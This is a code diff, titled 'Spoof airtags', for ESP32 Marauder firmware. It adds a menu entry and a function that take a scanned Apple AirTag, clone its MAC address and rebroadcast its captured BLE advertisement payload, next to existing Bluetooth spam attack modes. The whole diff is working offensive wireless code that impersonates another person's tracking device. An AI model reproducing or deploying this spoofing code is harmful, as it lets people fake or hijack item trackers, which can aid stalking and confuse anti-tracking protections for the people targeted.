Spoof airtags

esp32_marauder/MenuFunctions.cpp

@@ -592,6 +592,7 @@ void MenuFunctions::main(uint32_t currentTime)
           (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
           (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
           (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) ||
+          (wifi_scan_obj.currentScanMode == BT_SPOOF_AIRTAG) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
@@ -658,6 +659,7 @@ void MenuFunctions::main(uint32_t currentTime)
             (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
             (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
             (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) ||
+            (wifi_scan_obj.currentScanMode == BT_SPOOF_AIRTAG) ||
             (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
             (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
             (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
@@ -1227,6 +1229,7 @@ void MenuFunctions::RunSetup()
 {
   extern LinkedList<AccessPoint>* access_points;
   extern LinkedList<Station>* stations;
+  extern LinkedList<AirTag>* airtags;
 
   this->disable_touch = false;
   
@@ -1265,6 +1268,9 @@ void MenuFunctions::RunSetup()
   #endif
   wifiGeneralMenu.list = new LinkedList<MenuNode>();
   wifiAPMenu.list = new LinkedList<MenuNode>();
+  #ifdef HAS_BT
+    airtagMenu.list = new LinkedList<MenuNode>();
+  #endif
   #ifndef HAS_ILI9341
     wifiStationMenu.list = new LinkedList<MenuNode>();
   #endif
@@ -1323,6 +1329,9 @@ void MenuFunctions::RunSetup()
   clearSSIDsMenu.name = text_table1[28];
   clearAPsMenu.name = text_table1[29];
   wifiAPMenu.name = "Access Points";
+  #ifdef HAS_BT
+    airtagMenu.name = "Select Airtag";
+  #endif
   #ifndef HAS_ILI9341
     wifiStationMenu.name = "Select Stations";
   #endif
@@ -1663,6 +1672,7 @@ void MenuFunctions::RunSetup()
       this->changeMenu(wifiAPMenu.parentMenu);
     });
 
+
     // Select Stations on Mini v1
     /*
     this->addNodes(&wifiGeneralMenu, "Select Stations", TFT_CYAN, NULL, KEYBOARD_ICO, [this](){
@@ -1914,6 +1924,59 @@ void MenuFunctions::RunSetup()
     wifi_scan_obj.StartScan(BT_ATTACK_SPAM_ALL, TFT_MAGENTA);
   });
 
+  #ifndef HAS_ILI9341
+    // Select Airtag on Mini
+    this->addNodes(&bluetoothAttackMenu, "Spoof Airtag", TFT_WHITE, NULL, ATTACKS, [this](){
+        // Clear nodes and add back button
+        airtagMenu.list->clear();
+        this->addNodes(&airtagMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
+        this->changeMenu(airtagMenu.parentMenu);
+      });
+
+      // Add buttons for all airtags
+      // Find out how big our menu is going to be
+      int menu_limit;
+      if (airtags->size() <= BUTTON_ARRAY_LEN)
+        menu_limit = airtags->size();
+      else
+        menu_limit = BUTTON_ARRAY_LEN;
+
+      Serial.println("Found " + (String)airtags->size() + " airtag(s)");
+
+      // Create the menu nodes for all of the list items
+      for (int i = 0; i < menu_limit; i++) {
+        this->addNodes(&airtagMenu, airtags->get(i).mac, TFT_WHITE, NULL, BLUETOOTH, [this, i](){
+          AirTag new_at = airtags->get(i);
+          new_at.selected = true;
+
+          airtags->set(i, new_at);
+
+          // Set all other airtags to "Not Selected"
+          for (int x = 0; x < airtags->size(); x++) {
+            if (x != i) {
+              AirTag new_atx = airtags->get(x);
+              new_atx.selected = false;
+              airtags->set(x, new_atx);
+            }
+          }
+
+          // Start the spoof
+          display_obj.clearScreen();
+          this->drawStatusBar();
+          wifi_scan_obj.StartScan(BT_SPOOF_AIRTAG, TFT_WHITE);
+
+        });
+      }
+      this->changeMenu(&airtagMenu);
+    });
+
+    airtagMenu.parentMenu = &bluetoothAttackMenu;
+    this->addNodes(&airtagMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
+      this->changeMenu(airtagMenu.parentMenu);
+    });
+
+  #endif
+
   // Device menu
   deviceMenu.parentMenu = &mainMenu;
   this->addNodes(&deviceMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {

esp32_marauder/MenuFunctions.h

@@ -151,6 +151,9 @@ class MenuFunctions
     #endif
     Menu wifiGeneralMenu;
     Menu wifiAPMenu;
+    #ifdef HAS_BT
+      Menu airtagMenu;
+    #endif
     #ifndef HAS_ILI9341
       Menu wifiStationMenu;
     #endif

esp32_marauder/WiFiScan.cpp

@@ -176,6 +176,18 @@ extern "C" {
 
         break;
       }
+
+      case Airtag: {
+        for (int i = 0; i < airtags->size(); i++) {
+          if (airtags->get(i).selected) {
+            AdvData.addData(std::string((char*)airtags->get(i).payload.data(), airtags->get(i).payloadSize));
+
+            break;
+          }
+        }
+
+        break;
+      }
       default: {
         Serial.println("Please Provide a Company Type");
         break;
@@ -244,6 +256,7 @@ extern "C" {
             AirTag airtag;
             airtag.mac = mac;
             airtag.payload.assign(payLoad, payLoad + len);
+            airtag.payloadSize = len;
 
             airtags->add(airtag);
 
@@ -697,7 +710,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
            (scan_mode == BT_ATTACK_SPAM_ALL) ||
            (scan_mode == BT_ATTACK_SAMSUNG_SPAM) ||
            (scan_mode == BT_ATTACK_GOOGLE_SPAM) ||
-           (scan_mode == BT_ATTACK_FLIPPER_SPAM)) {
+           (scan_mode == BT_ATTACK_FLIPPER_SPAM) ||
+           (scan_mode == BT_SPOOF_AIRTAG)) {
     #ifdef HAS_BT
       RunSwiftpairSpam(scan_mode, color);
     #endif
@@ -885,6 +899,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
   (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
   (currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
   (currentScanMode == BT_ATTACK_FLIPPER_SPAM) ||
+  (currentScanMode == BT_SPOOF_AIRTAG) ||
   (currentScanMode == BT_SCAN_WAR_DRIVE) ||
   (currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
   (currentScanMode == BT_SCAN_SKIMMERS))
@@ -2051,7 +2066,7 @@ void WiFiScan::setBaseMacAddress(uint8_t macAddr[6]) {
 
   // Check for success or handle errors
   if (err == ESP_OK) {
-    Serial.println("Base MAC address successfully set.");
+    return;
   } else if (err == ESP_ERR_INVALID_ARG) {
     Serial.println("Error: Invalid MAC address argument.");
   } else {
@@ -2059,6 +2074,46 @@ void WiFiScan::setBaseMacAddress(uint8_t macAddr[6]) {
   }
 }
 
+void WiFiScan::executeSpoofAirtag() {
+  #ifdef HAS_BT
+    for (int i = 0; i < airtags->size(); i++) {
+      if (airtags->get(i).selected) {
+
+        uint8_t macAddr[6];
+
+        convertMacStringToUint8(airtags->get(i).mac, macAddr);
+
+        //macAddr[0] = 0x02;
+
+        macAddr[5] -= 2;
+
+        Serial.println("Using MAC: " + macToString(macAddr));
+
+        // Do this because ESP32 BT addr is Base MAC + 2
+        
+        this->setBaseMacAddress(macAddr);
+
+        NimBLEDevice::init("");
+
+        NimBLEServer *pServer = NimBLEDevice::createServer();
+
+        pAdvertising = pServer->getAdvertising();
+
+        //NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData();
+        NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(Airtag);
+        pAdvertising->setAdvertisementData(advertisementData);
+        pAdvertising->start();
+        delay(10);
+        pAdvertising->stop();
+
+        NimBLEDevice::deinit();
+
+        break;
+      }
+    }
+  #endif
+}
+
 void WiFiScan::executeSwiftpairSpam(EBLEPayloadType type) {
   #ifdef HAS_BT
     uint8_t macAddr[6];
@@ -2473,6 +2528,8 @@ void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) {
           display_obj.tft.drawCentreString("BLE Spam Google",120,16,2);
         else if (scan_mode == BT_ATTACK_FLIPPER_SPAM)
           display_obj.tft.drawCentreString("BLE Spam Flipper", 120, 16, 2);
+        else if (scan_mode == BT_SPOOF_AIRTAG)
+          display_obj.tft.drawCentreString("BLE Spoof Airtag", 120, 16, 2);
         display_obj.touchToExit();
       #endif
       display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
@@ -4922,7 +4979,8 @@ void WiFiScan::main(uint32_t currentTime)
            (currentScanMode == BT_ATTACK_SPAM_ALL) ||
            (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
            (currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
-           (currentScanMode == BT_ATTACK_FLIPPER_SPAM)) {
+           (currentScanMode == BT_ATTACK_FLIPPER_SPAM) ||
+           (currentScanMode == BT_SPOOF_AIRTAG)) {
     #ifdef HAS_BT
       if (currentTime - initTime >= 1000) {
         initTime = millis();
@@ -4958,6 +5016,10 @@ void WiFiScan::main(uint32_t currentTime)
       if ((currentScanMode == BT_ATTACK_FLIPPER_SPAM) ||
           (currentScanMode == BT_ATTACK_SPAM_ALL))
         this->executeSwiftpairSpam(FlipperZero);
+      
+      if (currentScanMode == BT_SPOOF_AIRTAG)
+        this->executeSpoofAirtag();
+
     #endif
   }
   else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {

esp32_marauder/WiFiScan.h

@@ -96,6 +96,7 @@
 #define BT_ATTACK_GOOGLE_SPAM 41
 #define BT_ATTACK_FLIPPER_SPAM 42
 #define BT_SCAN_AIRTAG 43
+#define BT_SPOOF_AIRTAG 44
 
 #define GRAPH_REFRESH 100
 
@@ -159,6 +160,7 @@ struct Station {
 struct AirTag {
     String mac;                  // MAC address of the AirTag
     std::vector<uint8_t> payload; // Payload data
+    uint16_t payloadSize;
     bool selected;
 };
 
@@ -273,7 +275,8 @@ class WiFiScan
       Apple,
       Samsung,
       Google,
-      FlipperZero
+      FlipperZero,
+      Airtag
     };
 
       #ifdef HAS_BT
@@ -302,6 +305,7 @@ class WiFiScan
     void clearMacHistory();
     void executeWarDrive();
     void executeSourApple();
+    void executeSpoofAirtag();
     void executeSwiftpairSpam(EBLEPayloadType type);
     void startWardriverWiFi();
     //void generateRandomMac(uint8_t* mac);

esp32_marauder/utils.h

@@ -55,6 +55,14 @@ String macToString(const Station& station) {
   return String(macStr);
 }
 
+String macToString(uint8_t macAddr[6]) {
+  char macStr[18]; // 17 characters for "XX:XX:XX:XX:XX:XX" + 1 null terminator
+  snprintf(macStr, sizeof(macStr), "%02X:%02X:%02X:%02X:%02X:%02X", 
+    macAddr[0], macAddr[1], macAddr[2], 
+    macAddr[3], macAddr[4], macAddr[5]);
+  return String(macStr);
+}
+
 void convertMacStringToUint8(const String& macStr, uint8_t macAddr[6]) {
     // Ensure the input string is in the format "XX:XX:XX:XX:XX:XX"
     if (macStr.length() != 17) {